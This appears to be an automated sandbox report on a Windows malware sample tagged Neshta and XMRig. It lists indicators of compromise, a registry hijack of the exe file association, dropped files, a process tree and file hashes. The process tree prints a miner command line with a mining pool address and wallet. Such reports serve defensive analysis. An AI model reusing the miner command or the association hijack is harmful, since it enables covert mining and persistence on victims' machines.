aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44

General
Target

aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe

Filesize

6MB

Completed

31-12-2021 09:39

Score
10/10
MD5

120e6c560c8582338b97bc1112703588

SHA1

4017ad3a595577f006273315a927764d6bf53941

SHA256

aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44

Malware Config
Signatures 16

Filter: none

Collection
Credential Access
Defense Evasion
Discovery
Persistence
  • Detect Neshta Payload

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x000500000001ab28-120.datfamily_neshta
    behavioral1/files/0x000500000001ab28-119.datfamily_neshta
    behavioral1/files/0x000500000001ab28-123.datfamily_neshta
    behavioral1/files/0x0004000000007698-129.datfamily_neshta
    behavioral1/files/0x000a000000015f0b-139.datfamily_neshta
    behavioral1/files/0x000b000000015fc5-138.datfamily_neshta
    behavioral1/files/0x00070000000162ce-147.datfamily_neshta
    behavioral1/files/0x00030000000161a3-146.datfamily_neshta
    behavioral1/files/0x00070000000162a8-145.datfamily_neshta
    behavioral1/files/0x0004000000016001-144.datfamily_neshta
    behavioral1/files/0x0004000000015f1d-143.datfamily_neshta
    behavioral1/files/0x00070000000162a6-142.datfamily_neshta
    behavioral1/files/0x000a000000015f01-141.datfamily_neshta
    behavioral1/files/0x000a000000015f16-140.datfamily_neshta
    behavioral1/files/0x000a000000015f25-149.datfamily_neshta
    behavioral1/files/0x0007000000016248-148.datfamily_neshta
    behavioral1/files/0x000100000001915c-155.datfamily_neshta
    behavioral1/files/0x000100000001915b-154.datfamily_neshta
    behavioral1/files/0x000100000001915a-153.datfamily_neshta
    behavioral1/files/0x0008000000007611-152.datfamily_neshta
    behavioral1/files/0x000500000001624e-151.datfamily_neshta
    behavioral1/files/0x000100000001a903-157.datfamily_neshta
    behavioral1/files/0x00020000000006b1-158.datfamily_neshta
    behavioral1/files/0x000100000001a8ff-156.datfamily_neshta
    behavioral1/files/0x0002000000019201-159.datfamily_neshta
    behavioral1/files/0x0002000000015a63-162.datfamily_neshta
    behavioral1/files/0x000a0000000148c6-161.datfamily_neshta
    behavioral1/files/0x00060000000148d6-160.datfamily_neshta
    behavioral1/files/0x000100000001a2a6-163.datfamily_neshta
    behavioral1/files/0x00060000000148d6-164.datfamily_neshta
  • Modifies system executable filetype association
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe

    TTPs

    Modify RegistryChange Default File Association

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
  • Neshta

    Description

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    Tags

  • Detected Stratum cryptominer command

    Description

    Looks to be attempting to contact Stratum mining pool.

    Tags

  • XMRig Miner Payload

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x000700000001ab1c-117.datxmrig
    behavioral1/files/0x000700000001ab1c-116.datxmrig
    behavioral1/files/0x000500000001ab29-121.datxmrig
    behavioral1/files/0x000500000001ab29-134.datxmrig
    behavioral1/files/0x000500000001ab29-133.datxmrig
  • Executes dropped EXE
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.comsvchost.comstart.exexmrig.exexmrig.exe

    Reported IOCs

    pidprocess
    3036aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    3424svchost.com
    3172svchost.com
    1376start.exe
    3292xmrig.exe
    3500xmrig.exe
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local SystemCredentials in Files
  • Drops file in Program Files directory
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.com

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~4.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\WINDOW~2\wabmig.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\WI54FB~1\setup_wm.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmpshare.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exesvchost.com
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\ExtExport.exesvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exesvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\MOZILL~1\UNINST~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\ielowutil.exesvchost.com
    File opened for modificationC:\PROGRA~2\WI54FB~1\setup_wm.exesvchost.com
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmplayer.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exesvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\ieinstal.exesvchost.com
    File opened for modificationC:\PROGRA~2\WINDOW~2\WinMail.exesvchost.com
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmplayer.exesvchost.com
    File opened for modificationC:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exesvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\INTERN~1\ielowutil.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exesvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exesvchost.com
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\WI8A19~1\ImagingDevices.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\WINDOW~4\ACCESS~1\wordpad.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\iexplore.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Google\Update\DISABL~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\WINDOW~2\wabmig.exesvchost.com
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmlaunch.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\WI8A19~1\ImagingDevices.exesvchost.com
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\INTERN~1\iexplore.exesvchost.com
    File opened for modificationC:\PROGRA~2\WINDOW~2\wab.exesvchost.com
    File opened for modificationC:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exesvchost.com
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmpconfig.exesvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmlaunch.exesvchost.com
    File opened for modificationC:\PROGRA~2\WI54FB~1\wmprph.exesvchost.com
    File opened for modificationC:\PROGRA~3\PACKAG~1\{F4220~1\VC_RED~1.EXEsvchost.com
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXEaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXEsvchost.com
  • Drops file in Windows directory
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.comsvchost.com

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\svchost.comaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    File opened for modificationC:\Windows\directx.syssvchost.com
    File opened for modificationC:\Windows\directx.syssvchost.com
    File opened for modificationC:\Windows\svchost.comsvchost.com
    File opened for modificationC:\Windows\svchost.comsvchost.com
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Modifies registry class
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exeOpenWith.exeOpenWith.exe

    Reported IOCs

    descriptioniocprocess
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    Key created\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settingsaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    Key created\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local SettingsOpenWith.exe
    Key created\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local SettingsOpenWith.exe
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pidprocess
    616
  • Suspicious use of AdjustPrivilegeToken
    xmrig.exexmrig.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeLockMemoryPrivilege3292xmrig.exe
    Token: SeLockMemoryPrivilege3500xmrig.exe
    Token: SeLockMemoryPrivilege3500xmrig.exe
    Token: SeLockMemoryPrivilege3292xmrig.exe
  • Suspicious use of SetWindowsHookEx
    OpenWith.exeOpenWith.exe

    Reported IOCs

    pidprocess
    1200OpenWith.exe
    4000OpenWith.exe
  • Suspicious use of WriteProcessMemory
    aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.comstart.exesvchost.comcmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 2416 wrote to memory of 30362416aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    PID 2416 wrote to memory of 30362416aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    PID 2416 wrote to memory of 30362416aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exeaa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    PID 3036 wrote to memory of 34243036aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.com
    PID 3036 wrote to memory of 34243036aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.com
    PID 3036 wrote to memory of 34243036aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.com
    PID 3036 wrote to memory of 31723036aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.com
    PID 3036 wrote to memory of 31723036aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.com
    PID 3036 wrote to memory of 31723036aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exesvchost.com
    PID 3172 wrote to memory of 13763172svchost.comstart.exe
    PID 3172 wrote to memory of 13763172svchost.comstart.exe
    PID 3172 wrote to memory of 13763172svchost.comstart.exe
    PID 1376 wrote to memory of 19161376start.execmd.exe
    PID 1376 wrote to memory of 19161376start.execmd.exe
    PID 1376 wrote to memory of 19161376start.execmd.exe
    PID 3424 wrote to memory of 32923424svchost.comxmrig.exe
    PID 3424 wrote to memory of 32923424svchost.comxmrig.exe
    PID 1916 wrote to memory of 35001916cmd.exexmrig.exe
    PID 1916 wrote to memory of 35001916cmd.exexmrig.exe
Processes 10
  • C:\Users\Admin\AppData\Local\Temp\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
    "C:\Users\Admin\AppData\Local\Temp\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe"
    Modifies system executable filetype association
    Drops file in Program Files directory
    Drops file in Windows directory
    Modifies registry class
    Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Users\Admin\AppData\Local\Temp\3582-490\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\aa49729965e546407fb7295d3ec68fd60ef327ce6c1047b71b0236de7925cb44.exe"
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Windows\svchost.com
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\xmrig.exe"
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        PID:3424
        • C:\Users\Admin\AppData\Local\Temp\xmrig.exe
          C:\Users\Admin\AppData\Local\Temp\xmrig.exe
          Executes dropped EXE
          Suspicious use of AdjustPrivilegeToken
          PID:3292
      • C:\Windows\svchost.com
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\start.exe"
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        PID:3172
        • C:\Users\Admin\AppData\Local\Temp\start.exe
          C:\Users\Admin\AppData\Local\Temp\start.exe
          Executes dropped EXE
          Suspicious use of WriteProcessMemory
          PID:1376
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\start.cmd" "
            Suspicious use of WriteProcessMemory
            PID:1916
            • C:\Users\Admin\AppData\Local\Temp\xmrig.exe
              xmrig.exe -o stratum+tcp://pool.supportxmr.com:5555 -u 49XvnNUfaH7Mr4rjpNrvLXJS8deqg1rBzPGnvuWrPnDmPRJ2w9HjvaN3sJyTYGKXzR9GYYMLZaaLhBzGEA7kKGtAFBkMYCK.rig1 -p x --donate-level 1
              Executes dropped EXE
              Suspicious use of AdjustPrivilegeToken
              PID:3500
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    Modifies registry class
    Suspicious use of SetWindowsHookEx
    PID:1200
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    Modifies registry class
    Suspicious use of SetWindowsHookEx
    PID:4000
Network
MITRE ATT&CK Matrix
Command and Control
    Credential Access
    Defense Evasion
    Execution
      Exfiltration
        Impact
          Initial Access
            Lateral Movement
              Privilege Escalation
                Replay Monitor
                00:00 00:00
                Downloads
                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

                  MD5

                  3b73078a714bf61d1c19ebc3afc0e454

                  SHA1

                  9abeabd74613a2f533e2244c9ee6f967188e4e7e

                  SHA256

                  ded54d1fcca07b6bff2bc3b9a1131eac29ff1f836e5d7a7c5c325ec5abe96e29

                  SHA512

                  75959d4e8a7649c3268b551a2a378e6d27c0bfb03d2422ebeeb67b0a3f78c079473214057518930f2d72773ce79b106fd2d78405e8e3d8883459dcbb49c163c4

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE

                  MD5

                  09acdc5bbec5a47e8ae47f4a348541e2

                  SHA1

                  658f64967b2a9372c1c0bdd59c6fb2a18301d891

                  SHA256

                  1b5c715d71384f043843ea1785a6873a9f39d2daae112ccdeffcd88b10a3a403

                  SHA512

                  3867bf98e1a0e253114a98b78b047b0d8282b5abf4aaf836f31cc0e26224e2a1b802c65df9d90dc7696a6dbcb9a8e4b900f1d1299e1b11e36f095ebaf8a2e5b8

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe

                  MD5

                  576410de51e63c3b5442540c8fdacbee

                  SHA1

                  8de673b679e0fee6e460cbf4f21ab728e41e0973

                  SHA256

                  3f00404dd591c2856e6f71bd78423ed47199902e0b85f228e6c4de72c59ddffe

                  SHA512

                  f7761f3878775b30cc3d756fa122e74548dfc0a27e38fa4109e34a59a009df333d074bf14a227549ae347605f271be47984c55148685faac479aeb481f7191db

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe

                  MD5

                  322302633e36360a24252f6291cdfc91

                  SHA1

                  238ed62353776c646957efefc0174c545c2afa3d

                  SHA256

                  31da9632f5d25806b77b617d48da52a14afc574bbe1653120f97705284ea566c

                  SHA512

                  5a1f7c44ce7f5036bffc18ebac39e2bf70e6f35fa252617d665b26448f4c4473adfa115467b7e2d9b7068823e448f74410cdcdfef1ac1c09021e051921787373

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe

                  MD5

                  8ffc3bdf4a1903d9e28b99d1643fc9c7

                  SHA1

                  919ba8594db0ae245a8abd80f9f3698826fc6fe5

                  SHA256

                  8268d3fefe8ca96a25a73690d14bacf644170ab5e9e70d2f8eeb350a4c83f9f6

                  SHA512

                  0b94ead97374d74eaee87e7614ddd3911d2cf66d4c49abbfd06b02c03e5dd56fd00993b4947e8a4bcd9d891fa39cab18cc6b61efc7d0812e91eb3aea9cd1a427

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE

                  MD5

                  9dfcdd1ab508b26917bb2461488d8605

                  SHA1

                  4ba6342bcf4942ade05fb12db83da89dc8c56a21

                  SHA256

                  ecd5e94da88c653e4c34b6ab325e0aca8824247b290336f75c410caa16381bc5

                  SHA512

                  1afc1b95f160333f1ff2fa14b3f22a28ae33850699c6b5498915a8b6bec1cfc40f33cb69583240aa9206bc2ea7ab14e05e071275b836502a92aa8c529fc1b137

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe

                  MD5

                  5791075058b526842f4601c46abd59f5

                  SHA1

                  b2748f7542e2eebcd0353c3720d92bbffad8678f

                  SHA256

                  5c3ef3ec7594c040146e908014791dd15201ba58b4d70032770bb661b6a0e394

                  SHA512

                  83e303971ed64019fde9e4ba6f6e889f8fb105088490dfa7dcf579a12baff20ef491f563d132d60c7b24a4fd3cac29bd9dc974571cd162000fae8fba4e0e54fb

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE

                  MD5

                  4ddc609ae13a777493f3eeda70a81d40

                  SHA1

                  8957c390f9b2c136d37190e32bccae3ae671c80a

                  SHA256

                  16d65f2463658a72dba205dcaa18bc3d0bab4453e726233d68bc176e69db0950

                  SHA512

                  9d7f90d1529cab20078c2690bf7bffab5a451a41d8993781effe807e619da0e7292f991da2f0c5c131b111d028b3e6084e5648c90816e74dfb664e7f78181bc5

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE

                  MD5

                  8c753d6448183dea5269445738486e01

                  SHA1

                  ebbbdc0022ca7487cd6294714cd3fbcb70923af9

                  SHA256

                  473eb551101caeaf2d18f811342e21de323c8dd19ed21011997716871defe997

                  SHA512

                  4f6fddefc42455540448eac0b693a4847e21b68467486376a4186776bfe137337733d3075b7b87ed7dac532478dc9afc63883607ec8205df3f155fee64c7a9be

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE

                  MD5

                  176436d406fd1aabebae353963b3ebcf

                  SHA1

                  9ffdfdb8cc832a0c6501c4c0e85b23a0f7eff57a

                  SHA256

                  2f947e3ca624ce7373080b4a3934e21644fb070a53feeaae442b15b849c2954f

                  SHA512

                  a2d1a714e0c1e5463260c64048ba8fd5064cfa06d4a43d02fc04a30748102ff5ba86d20a08e611e200dc778e2b7b3ae808da48132a05a61aa09ac424a182a06a

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe

                  MD5

                  cce8964848413b49f18a44da9cb0a79b

                  SHA1

                  0b7452100d400acebb1c1887542f322a92cbd7ae

                  SHA256

                  fe44ca8d5050932851aa54c23133277e66db939501af58e5aeb7b67ec1dde7b5

                  SHA512

                  bf8fc270229d46a083ced30da6637f3ca510b0ce44624a9b21ec6aacac81666dffd41855053a936aa9e8ea6e745a09b820b506ec7bf1173b6f1837828a35103d

                • C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE

                  MD5

                  12c29dd57aa69f45ddd2e47620e0a8d9

                  SHA1

                  ba297aa3fe237ca916257bc46370b360a2db2223

                  SHA256

                  22a585c183e27b3c732028ff193733c2f9d03700a0e95e65c556b0592c43d880

                  SHA512

                  255176cd1a88dfa2af3838769cc20dc7ad9d969344801f07b9ebb372c12cee3f47f2dba3559f391deab10650875cad245d9724acfa23a42b336bfa96559a5488

                • C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE

                  MD5

                  bcd0f32f28d3c2ba8f53d1052d05252d

                  SHA1

                  c29b4591df930dabc1a4bd0fa2c0ad91500eafb2

                  SHA256

                  bb07d817b8b1b6b4c25e62b6120e51dec10118557d7b6b696ad084a5ba5bfdeb

                  SHA512

                  79f407735853f82f46870c52058ceee4d91857a89db14868ee1169abd5c0fd2e3fa1ed230ab90b5f479a9581b88998643d69b0df498defea29e73b0d487f3b10

                • C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\armsvc.exe

                  MD5

                  8db8df5afb216d89fcb0bdf24662c9b5

                  SHA1

                  f0819d096526f02b0f7c50b56cebd7c521600897

                  SHA256

                  bc9c19ede72076a2c8cc18a4b2305cabc999244fb92d471c87036bb796d3f89f

                  SHA512

                  dc63a71b6b04e89ecf744bf890c74caa11cb3525aeccaede6dafa72fa3eebd40b8d352651d0bc8b1deb0768a38e5c2660200cac84eec48ddab01beaa8c9c0bea

                • C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe

                  MD5

                  d90510a290c2987a2613df8eba3264cf

                  SHA1

                  226b619ccd33c2a186aef6cbb759b2d4cf16fff5

                  SHA256

                  49577d0c54d9f941d25346dd964f309da452b62bfb09282cabc2fbcb169fdf5d

                  SHA512

                  e0554a501009dd67bd1dbd586ad66a90ad2d75aa67782fc5fbb783aeaed7ef8e525e70bd96a6eb8a1f9008f541e2f281061d30b7886aae771f226c5b882d8247

                • C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe

                  MD5

                  2d3cc5612a414f556f925a3c1cb6a1d6

                  SHA1

                  0fee45317280ed326e941cc2d0df848c4e74e894

                  SHA256

                  fe46de1265b6fe2e316aca33d7f7f45c6ffdf7c49a044b464fd9dc88ec92091b

                  SHA512

                  cc49b200adf92a915da6f9b73417543d4dcc77414e0c4bd2ce3bfdfc5d151e0b28249f8d64f6b7087cf8c3bab6aeeab5b152ac6199cb7cc63e64a66b4f03a9f5

                • C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe

                  MD5

                  6e84b6096aaa18cabc30f1122d5af449

                  SHA1

                  e6729edd11b52055b5e34d39e5f3b8f071bbac4f

                  SHA256

                  c6b7f9119cf867951f007c5468f75eb4dca59c7eedeb0afdd8ad9d5b9606e759

                  SHA512

                  af5b33e7e190587bb152adf65fbcd4c1cd521f638863a6d1c7de29599cce6439b6c7b653180661cb0382007aefa0ae5a1b1b841eaaa116ce715f3a5ba0725a42

                • C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE

                  MD5

                  f2056a3543ba9b6b6dde4346614b7f82

                  SHA1

                  139129616c3a9025a5cb16f9ad69018246bd9e2d

                  SHA256

                  2bab7d64d5327ca21ffd13df88b30431d0b8c0dd6cad8f4bb4db33eeb2b37d1e

                  SHA512

                  e11d1c65e046a0a6817cec4d17df1b7f5849fdb5b95527fdef78f0c433294fd2186037116a581ec3a66b07f1ab75cd8e60e408005cd64bc5eacc61a582da0942

                • C:\PROGRA~2\MOZILL~1\UNINST~1.EXE

                  MD5

                  e7d2d4bedb99f13e7be8338171e56dbf

                  SHA1

                  8dafd75ae2c13d99e5ef8c0e9362a445536c31b5

                  SHA256

                  c8ef54853df3a3b64aa4b1ecfb91615d616c7ff998589e5a3434118611ad2a24

                  SHA512

                  2017dea799cc03b02a17e3616fb6fbe8c86ab2450b1aaf147fce1e67cc472ded12befd686d395386ffdaa992145996eb421d61d3a922cea45e94ac40eef76adc

                • C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe

                  MD5

                  05bdfd8a3128ab14d96818f43ebe9c0e

                  SHA1

                  495cbbd020391e05d11c52aa23bdae7b89532eb7

                  SHA256

                  7b945c7e6b8bfbb489f003ecd1d0dcd4803042003de4646d4206114361a0fbbb

                  SHA512

                  8d9b9fc407986bd53fe3b56c96b7371cc782b4bac705253bfb0a2b0b1e6883fdb022f1ac87b8bfd7005291991b6a3dfbaceab54f5d494e0af70f0435a0b8b0da

